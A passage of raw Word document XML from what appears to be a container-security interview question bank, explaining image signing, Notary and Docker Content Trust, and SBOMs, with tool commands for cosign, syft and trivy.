        <w:t xml:space="preserve">               4. Network Policies → pod communication control</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Falco → runtime threat detection</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>SELinux (Security-Enhanced Linux) is a Linux kernel security framework that implements Mandatory Access Control using security labels and policies. Unlike traditional Linux permissions, SELinux can restrict what processes, users, and applications can access even when they have OS-level permissions. It operates using security contexts and type enforcement, allowing administrators to define exactly which resources a process can access. SELinux is widely used in RHEL, OpenShift, and enterprise environments to improve system and container security and is often used alongside Seccomp, AppArmor, and Kubernetes security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q392. Who created the image (authenticity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 2. The image has not been modified (integrity)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. The image comes from a trusted source (trust)</w:t>
        <w:br/>
        <w:t>It helps prevent attackers from pushing malicious or tampered images into your container registry.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need Image Signing?</w:t>
        <w:br/>
        <w:t>Without image signing:</w:t>
        <w:br/>
        <w:t>Developer → Build Image → Push to Registry → Deploy</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>An attacker could:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replace the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Push a malicious image with the same tag</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Modify the image in transit</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compromise the registry</w:t>
        <w:br/>
        <w:t>Kubernetes would deploy it without knowing.</w:t>
        <w:br/>
        <w:t>With image signing:</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Verify Signature</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Only trusted images are deployed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>Imagine your team builds:</w:t>
        <w:br/>
        <w:t>payment-service:v1.2</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image digest:</w:t>
        <w:br/>
        <w:t>sha256:abc123...</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The image is signed using a private key.</w:t>
        <w:br/>
        <w:t>Later during deployment:</w:t>
        <w:br/>
        <w:t>Verify Signature</w:t>
        <w:br/>
        <w:t>✓ Signed by trusted team</w:t>
        <w:br/>
        <w:t>✓ Digest matches</w:t>
        <w:br/>
        <w:t>✓ Image not altered</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deployment proceeds.</w:t>
        <w:br/>
        <w:t>If someone changes the image:</w:t>
        <w:br/>
        <w:t>Signature Verification Failed</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deployment is blocked.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Image Signing Works</w:t>
        <w:br/>
        <w:t>Step 1: Build Image</w:t>
        <w:br/>
        <w:t>docker build -t payment-service:v1 .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Generate Signature</w:t>
        <w:br/>
        <w:t>A cryptographic hash is created and signed using a private key.</w:t>
        <w:br/>
        <w:t>Image Digest</w:t>
        <w:br/>
        <w:t>+</w:t>
        <w:br/>
        <w:t>Private Key</w:t>
        <w:br/>
        <w:t>=</w:t>
        <w:br/>
        <w:t>Digital Signature</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Push Image &amp; Signature</w:t>
        <w:br/>
        <w:t>Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Image</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── Signature</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 4: Verify Before Deployment</w:t>
        <w:br/>
        <w:t>The public key verifies:</w:t>
        <w:br/>
        <w:t>Image Digest</w:t>
        <w:br/>
        <w:t>+</w:t>
        <w:br/>
        <w:t>Public Key</w:t>
        <w:br/>
        <w:t>=</w:t>
        <w:br/>
        <w:t>Valid Signature</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Image Signing Tools</w:t>
        <w:br/>
        <w:t>Cosign</w:t>
        <w:br/>
        <w:t>Most popular cloud-native signing tool.</w:t>
        <w:br/>
        <w:t>cosign sign my-registry/app:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify:</w:t>
        <w:br/>
        <w:t>cosign verify my-registry/app:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Notary</w:t>
        <w:br/>
        <w:t>Used with Docker Content Trust.</w:t>
        <w:br/>
        <w:t>export DOCKER_CONTENT_TRUST=1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sigstore</w:t>
        <w:br/>
        <w:t>Provides:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Keyless signing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Transparency logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Certificate-based verification</w:t>
        <w:br/>
        <w:t>Used by Cosign.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image Signing in Kubernetes</w:t>
        <w:br/>
        <w:t>Admission controllers can verify signatures before allowing deployment.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kyverno</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OPA Gatekeeper</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sigstore Policy Controller</w:t>
        <w:br/>
        <w:t>Example policy:</w:t>
        <w:br/>
        <w:t>verifyImages:</w:t>
        <w:br/>
        <w:t>- imageReferences:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - "gcr.io/company/*"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Unsigned Image → Block</w:t>
        <w:br/>
        <w:t>Signed Image → Allow</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image Signing vs Image Scanning</w:t>
        <w:br/>
        <w:t>Image Signing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Image Scanning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Verifies trust</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds vulnerabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks authenticity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks CVEs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses cryptographic signatures</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses vulnerability databases</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prevents tampering</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Improves security posture</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment trust</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vulnerability assessment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>You should use both.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Supply Chain Security</w:t>
        <w:br/>
        <w:t>Image signing is a critical part of software supply chain security.</w:t>
        <w:br/>
        <w:t>Typical secure pipeline:</w:t>
        <w:br/>
        <w:t>Git Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>CI/CD Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Image Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Image Sign</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Push Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Signature Verification</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Deploy to Kubernetes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This aligns with frameworks such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OpenSSF</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SLSA</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Image signing is the process of digitally signing a container image using cryptographic keys to verify its authenticity and integrity. It ensures that the image was produced by a trusted source and has not been modified after it was built. In modern Kubernetes and cloud-native environments, tools like Cosign and Sigstore are commonly used to sign images, while admission controllers verify signatures before deployment. Image signing is a key component of software supply chain security and is often combined with image scanning to ensure both trust and vulnerability management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q393. What is Notary?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Notary?</w:t>
        <w:br/>
        <w:t>Notary is an open-source project that enables container image signing and verification. It allows publishers to digitally sign container images and allows users to verify that those images come from a trusted source and have not been tampered with.</w:t>
        <w:br/>
        <w:t>Notary is the technology behind Docker Content Trust (DCT).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Notary?</w:t>
        <w:br/>
        <w:t>Without image signing:</w:t>
        <w:br/>
        <w:t>docker pull nginx:latest</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>You don't know:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Who published the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Whether it was modified</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Whether the registry was compromised</w:t>
        <w:br/>
        <w:t>With Notary:</w:t>
        <w:br/>
        <w:t>docker pull nginx:latest</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Verify Signature</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Trusted Image</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Only signed and trusted images are pulled.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Notary Works</w:t>
        <w:br/>
        <w:t>Notary uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Public/Private Key Cryptography</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Digital Signatures</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Trusted Metadata</w:t>
        <w:br/>
        <w:t>Workflow:</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Notary Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Client Verifies Signature</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Content Trust (DCT)</w:t>
        <w:br/>
        <w:t>Enable DCT:</w:t>
        <w:br/>
        <w:t>export DOCKER_CONTENT_TRUST=1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Push signed image:</w:t>
        <w:br/>
        <w:t>docker push myrepo/payment-service:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker automatically:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Signs the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Stores signature metadata in Notary</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pushes image to registry</w:t>
        <w:br/>
        <w:t>Pull image:</w:t>
        <w:br/>
        <w:t>docker pull myrepo/payment-service:1.0</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker verifies the signature before pulling.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Types in Notary</w:t>
        <w:br/>
        <w:t>Root Key</w:t>
        <w:br/>
        <w:t>Highest-trust key.</w:t>
        <w:br/>
        <w:t>Used to establish trust.</w:t>
        <w:br/>
        <w:t>Root Key</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Signs Repository Keys</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Repository Key (Targets Key)</w:t>
        <w:br/>
        <w:t>Signs image metadata.</w:t>
        <w:br/>
        <w:t>payment-service:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Snapshot Key</w:t>
        <w:br/>
        <w:t>Protects metadata versions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Timestamp Key</w:t>
        <w:br/>
        <w:t>Ensures metadata freshness and prevents replay attacks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t>docker push myrepo/app:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Metadata created:</w:t>
        <w:br/>
        <w:t>root.json</w:t>
        <w:br/>
        <w:t>targets.json</w:t>
        <w:br/>
        <w:t>snapshot.json</w:t>
        <w:br/>
        <w:t>timestamp.json</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify Image</w:t>
        <w:br/>
        <w:t>docker pull myrepo/app:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verification:</w:t>
        <w:br/>
        <w:t>✓ Signature Valid</w:t>
        <w:br/>
        <w:t>✓ Trusted Publisher</w:t>
        <w:br/>
        <w:t>✓ Image Untampered</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Notary Architecture</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">     |</w:t>
        <w:br/>
        <w:t xml:space="preserve">     | Sign</w:t>
        <w:br/>
        <w:t xml:space="preserve">     v</w:t>
        <w:br/>
        <w:t>Registry &lt;----&gt; Notary Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ^</w:t>
        <w:br/>
        <w:t xml:space="preserve">     |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Client Verifies</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Components:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Registry stores images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Notary stores trust metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Clients verify signatures</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations of Notary v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Complex key management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Difficult key rotation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Docker-centric design</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Less Kubernetes-native</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Operational overhead</w:t>
        <w:br/>
        <w:t>Because of these limitations, many organizations have moved toward Sigstore-based solutions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modern Alternative: Cosign</w:t>
        <w:br/>
        <w:t>Today most Kubernetes and cloud-native platforms prefer:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cosign</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sigstore</w:t>
        <w:br/>
        <w:t>Advantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Keyless signing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OIDC integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes-native</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easier automation</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>cosign sign gcr.io/project/app:v1</w:t>
        <w:br/>
        <w:t>cosign verify gcr.io/project/app:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Notary vs Cosign</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Notary</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cosign</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Content Trust</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container signing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes-native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Keyless signing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OIDC integration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Popular for modern K8s</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less common</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Notary is an open-source framework for digitally signing and verifying container images. It is the foundation of Docker Content Trust and uses public/private key cryptography to ensure image authenticity and integrity. When an image is pushed, Notary stores signed metadata, and when the image is pulled, the client verifies the signature before use. This prevents deployment of tampered or untrusted images. While Notary was widely used with Docker Content Trust, many modern Kubernetes environments now prefer Cosign and Sigstore because they provide simpler key management, keyless signing, and better cloud-native integration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q394. Explain SBOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is SBOM?</w:t>
        <w:br/>
        <w:t>SBOM (Software Bill of Materials) is a complete inventory of all components, libraries, dependencies, packages, and modules used to build a software application or container image.</w:t>
        <w:br/>
        <w:t>Think of it like an ingredient list on a food package.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why SBOM is Important</w:t>
        <w:br/>
        <w:t>When a security vulnerability is announced, organizations need to quickly answer:</w:t>
        <w:br/>
        <w:t>"Are we using the affected library?"</w:t>
        <w:br/>
        <w:t>Without an SBOM:</w:t>
        <w:br/>
        <w:t>Search source code manually</w:t>
        <w:br/>
        <w:t>Check container images</w:t>
        <w:br/>
        <w:t>Inspect dependencies</w:t>
        <w:br/>
        <w:t>Hours or days of effort</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>With an SBOM:</w:t>
        <w:br/>
        <w:t>Search SBOM</w:t>
        <w:br/>
        <w:t>Find affected component</w:t>
        <w:br/>
        <w:t>Identify impacted applications</w:t>
        <w:br/>
        <w:t>Take action immediately</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose your application uses:</w:t>
        <w:br/>
        <w:t>Payment Service</w:t>
        <w:br/>
        <w:t>├── Spring Boot 3.2</w:t>
        <w:br/>
        <w:t>├── Log4j 2.17</w:t>
        <w:br/>
        <w:t>├── Jackson 2.15</w:t>
        <w:br/>
        <w:t>├── PostgreSQL Driver</w:t>
        <w:br/>
        <w:t>└── Apache Commons</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The SBOM records all these dependencies and their versions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example: Log4Shell</w:t>
        <w:br/>
        <w:t>During the Log4Shell Vulnerability Disclosure vulnerability:</w:t>
        <w:br/>
        <w:t>Organizations asked:</w:t>
        <w:br/>
        <w:t>Do we use Log4j?</w:t>
        <w:br/>
        <w:t>Which applications?</w:t>
        <w:br/>
        <w:t>Which versions?</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Companies with SBOMs could identify affected systems quickly.</w:t>
        <w:br/>
        <w:t>Companies without SBOMs often spent days investigating.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Information Does an SBOM Contain?</w:t>
        <w:br/>
        <w:t>Typical fields:</w:t>
        <w:br/>
        <w:t>Field</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Package Name</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Log4j</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Version</w:t>
        <w:br/>
        <w:tab/>
        <w:t>2.14.1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supplier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Apache</w:t>
        <w:br/>
        <w:tab/>
        <w:t>License</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Apache 2.0</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hash</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SHA256</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dependencies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Other libraries</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Component Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Library, Framework, OS Package</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "log4j",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "version": "2.14.1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "supplier": "Apache",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "license": "Apache-2.0"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM for Containers</w:t>
        <w:br/>
        <w:t>Container Image:</w:t>
        <w:br/>
        <w:t>payment-service:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>May contain:</w:t>
        <w:br/>
        <w:t>Ubuntu Base Image</w:t>
        <w:br/>
        <w:t>OpenSSL</w:t>
        <w:br/>
        <w:t>Python</w:t>
        <w:br/>
        <w:t>Flask</w:t>
        <w:br/>
        <w:t>Requests</w:t>
        <w:br/>
        <w:t>NumPy</w:t>
        <w:br/>
        <w:t>Application Code</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>An SBOM lists everything inside the image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM Formats</w:t>
        <w:br/>
        <w:t>SPDX</w:t>
        <w:br/>
        <w:t>Created by the Linux Foundation.</w:t>
        <w:br/>
        <w:t>Most widely adopted format.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>SPDX Version: SPDX-2.3</w:t>
        <w:br/>
        <w:t>PackageName: log4j</w:t>
        <w:br/>
        <w:t>PackageVersion: 2.14.1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CycloneDX</w:t>
        <w:br/>
        <w:t>Created by the OWASP Foundation.</w:t>
        <w:br/>
        <w:t>Popular in DevSecOps and container security.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SWID</w:t>
        <w:br/>
        <w:t>Software Identification Tags standard.</w:t>
        <w:br/>
        <w:t>Less common in cloud-native environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM Generation Tools</w:t>
        <w:br/>
        <w:t>Syft</w:t>
        <w:br/>
        <w:t>Generate SBOM from container image:</w:t>
        <w:br/>
        <w:t>syft nginx:latest</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Generate SPDX:</w:t>
        <w:br/>
        <w:t>syft nginx:latest -o spdx-json</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Trivy</w:t>
        <w:br/>
        <w:t>trivy image --format cyclonedx nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Creates SBOM and scans vulnerabilities.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Anchore Enterprise</w:t>
        <w:br/>
        <w:t>Enterprise SBOM and compliance management.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM in CI/CD</w:t>
        <w:br/>
        <w:t>Modern secure pipeline:</w:t>
        <w:br/>
        <w:t>Git Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Generate SBOM</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Vulnerability Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Push Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM and Supply Chain Security</w:t>
        <w:br/>
        <w:t>SBOM is a key requirement in modern software supply chain security.</w:t>
        <w:br/>
        <w:t>It helps with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compliance audits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * License management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Incident response</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Third-party risk assessment</w:t>
        <w:br/>
        <w:t>Frameworks that encourage SBOM usage:</w:t>
        <w:br/>
